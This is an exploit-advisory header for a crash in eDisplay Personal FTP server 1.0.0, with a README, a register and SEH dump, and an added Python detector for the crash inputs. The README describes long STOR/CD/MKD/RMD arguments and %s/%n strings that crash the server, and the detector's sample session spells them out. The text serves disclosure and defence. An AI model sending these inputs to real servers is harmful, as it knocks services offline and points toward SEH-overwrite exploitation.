# Title: eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Crash (PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Hats off to dookie2000ca
# Discovery date: 16/03/2010
# Software link: http://edisplay-personal-ftp-server.software.informer.com/
# Tested on: Windows XP SP3 Professional
# Nod to the Exploit-DB Team

# Vendor informed via email : 17/03/2010

#THE README PART
#The STOR command will crash the server and overwrite a few interesting CPU registers (as shown below).
#Other commands that will give similar results are: CD / MKD / RMD. They all overwrite SEH in the same
#manner as the STOR command.
#During our research, we discovered many other DoS possibilities. These character combinations (%s & %n like DELE)
#are pretty good at crashing this application.
#As always, if someone wishes to take this further go right ahead. Play nice, and remember where you got it from.
#Thank you.
20
21
#SEH chain of main thread
#Address  SE handler
#0012C888 41414141

#EAX 7EFEFEFE
#ECX 0012FEF8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\AAAAAAAA,,,,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDX 41414141
#EBX 0139B8D0
#ESP 0012C30C
#EBP 0012C894 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAA\AAAAAAAAAAAAAAAAAA
#ESI 00000000
#EDI 0012FFFD
#EIP 50E14321 FtpSer_1.50E14321
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDF000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty %#.19L
#ST1 empty %#.19L
#ST2 empty +UNORM 19C4 00000000 7FFDF000
#ST3 empty -NAN FFFF 805970D5 F6B61A24
#ST4 empty -UNORM F000 0012FFA8 7FFDF6CC
#ST5 empty +UNORM 0010 00000000 F6B62000
#ST6 empty 0.0
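The README above describes two input shapes that bring this server down: very long arguments to STOR/CD/MKD/RMD (long enough to overwrite the SEH record) and format specifiers such as %s or %n in command arguments. The following is an added detection example, not part of the original PoC, that inspects FTP control-channel command lines (from a proxy, an IDS prototype or a control-channel log) and flags both shapes. The command set, the 255-byte argument threshold, the format-specifier pattern and the sample session are all assumptions constructed for the example.

```python
"""Added example (not part of the original PoC): flag FTP control-channel
commands whose arguments look like the crash inputs described in the
README above (over-long arguments to the named commands, or C-style
format specifiers in any argument)."""
import re

# Commands the README names as crashing the server with long arguments
# (CD listed as both its RFC 959 spelling CWD and the README's CD).
LENGTH_SENSITIVE = {"STOR", "CWD", "CD", "MKD", "RMD"}

# Assumed threshold: the PoC needs a long run of filler to reach the SEH
# record, so anything beyond a sane path length is worth a look. Tune it.
MAX_ARG_LEN = 255

# Assumed pattern for the %s / %n style specifiers the README mentions.
FORMAT_SPEC = re.compile(r"%[0-9]*[snxdp]")


def inspect_ftp_command(line):
    """Return a list of findings (strings) for one FTP control-channel line.

    An empty list means the line looked benign under these two checks.
    """
    line = line.rstrip("\r\n")
    parts = line.split(" ", 1)
    cmd = parts[0].upper()
    arg = parts[1] if len(parts) > 1 else ""
    findings = []
    if cmd in LENGTH_SENSITIVE and len(arg) > MAX_ARG_LEN:
        findings.append(f"{cmd}: argument length {len(arg)} exceeds {MAX_ARG_LEN}")
    if FORMAT_SPEC.search(arg):
        findings.append(f"{cmd}: format specifier in argument")
    return findings


def scan(lines):
    """Return {line_number: findings} for every line with at least one finding."""
    result = {}
    for number, line in enumerate(lines, 1):
        findings = inspect_ftp_command(line)
        if findings:
            result[number] = findings
    return result


# Constructed sample session (not captured traffic): two benign commands,
# one over-long STOR argument and one DELE with format specifiers.
SAMPLE_SESSION = [
    "USER test",
    "PASS test",
    "CWD /pub",
    "STOR " + "A" * 600,
    "DELE %s%s%n",
    "RETR readme.txt",
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_SESSION).items():
        print(f"line {number}: {'; '.join(findings)}")
```

Running the block prints findings for lines 4 and 5 of the constructed session only. The two checks are deliberately independent, so a single line can produce both findings; a proxy that enforces the length limit before forwarding to the server removes the SEH-overwrite input entirely, while the format-specifier check is a detection signal rather than a hard block, since a legitimate filename can contain a percent sign.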